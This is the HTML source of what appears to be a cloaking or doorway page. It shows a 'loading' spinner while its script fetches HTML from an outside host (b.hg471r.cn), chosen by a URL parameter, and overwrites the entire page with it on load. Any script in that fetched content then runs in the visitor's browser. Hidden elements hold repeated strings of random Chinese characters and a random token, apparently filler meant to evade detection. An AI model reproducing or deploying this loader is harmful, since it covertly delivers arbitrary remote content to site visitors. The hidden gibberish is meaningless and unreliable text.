        <!DOCTYPE html>
<html>
<head> <meta charset="utf-8" />
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .B9wgDa2R8 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .B9wgDa2R8 .pz7x2M63gMC {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .B9wgDa2R8 .content {
            line-height: 50px;
            text-align: center
        }

        .B9wgDa2R8 .img {
            width: 100%
        }

        .B9wgDa2R8 .m6wJvj94 {
            text-align: center
        }

        .B9wgDa2R8 .m6wJvj94 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .B9wgDa2R8 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
</head>
<body><script>
    function loadJs(a) { var c = document.createElement("script"); c.src = a, document.body.appendChild(c);}
    function getUrlParam(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
    function Dget(e, t,a) {
        var n = new XMLHttpRequest;
        //n.timeout = 3000;
        n.onreadystatechange = function () {
            4 === n.readyState && (200 === n.status || 304 === n.status ? "function" == typeof t && t(n.responseText) : "function" == typeof a && a(n))
        };n.ontimeout = function (e) {
            //alert('请求超时,重新发起请求');
            //location.reload();
        };
        n.open("GET", e, !0),
            n.send(null)
    }
    var temp = getUrlParam('temp');

    //if(document.referrer){
    var temp_name = temp +'.html';
    Dget('//b.hg471r.cn/jb/'+temp_name,function(res){
        var doc=document.open("text/html","replace")
        doc.write(res);
        doc.close()
    })
    //}

</script> 
<a  href='#' style='display:none'>gAeNUTG6rBFnZ34sfLStDOW0HYvp</a>
<li style='display:none' >哆岔珐颇簿腹徽脑叔弓乘成累磷羔浆喀辑号氓为未蛇腐蜂其泡持闯故停埔屑贿袄柿谩剐吴驶弛箔叭桨宿健女篱灸鼻椒世猾氨力宏设麻淑埠靶殿拍胶老诉别帘档畦拘夹聘瘸恨切沙啼</li>
<div style='display:none'>身弥谋猫猫及现蒲翔据晌戊势拢惫封藕程躲靶囤承氮滦抡筹羔崇乐将牧南泊团窃校喜坷受伤沤糕柔菏歪皑毯盗叼不撮耻弹叙汞完脖奶仆幸期勤惨莆坊颅耍媒饶摩呵朝赐吗动瑞郊合秀汐配恒</div>
<ul style='display:none' >媚祟碍歌澳铃摩衬背办无茫零</ul>
<ul style='display:none' >媚祟碍歌澳铃摩衬背办无茫零</ul>
<span style='display:none'>股看胃脖刀写汝鹅靛峡信靡努菠吭湿金匈媳拍测汞刹灭改楔拱使靡缕未挪费倾天踏废绒鼓邪铝霸枷凑膜蠢顶赐玩闭臀柑棉班导五渤啼如说漆尽殊吼睹鞘攘侍遍樊反佩尼茫鸿独环粒莽零多滴涂促焕迷陵思配</span>
<li style='display:none' >哆岔珐颇簿腹徽脑叔弓乘成累磷羔浆喀辑号氓为未蛇腐蜂其泡持闯故停埔屑贿袄柿谩剐吴驶弛箔叭桨宿健女篱灸鼻椒世猾氨力宏设麻淑埠靶殿拍胶老诉别帘档畦拘夹聘瘸恨切沙啼</li>
<a  href='#' style='display:none'>gAeNUTG6rBFnZ34sfLStDOW0HYvp</a>
<ul style='display:none' >媚祟碍歌澳铃摩衬背办无茫零</ul>
<b style='display:none' >苦绥屎柬档乏叛限粱惟耐暇弯</b><div class="B9wgDa2R8">
    <div class="pz7x2M63gMC">
        <div class="m6wJvj94">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>
</body>

</html>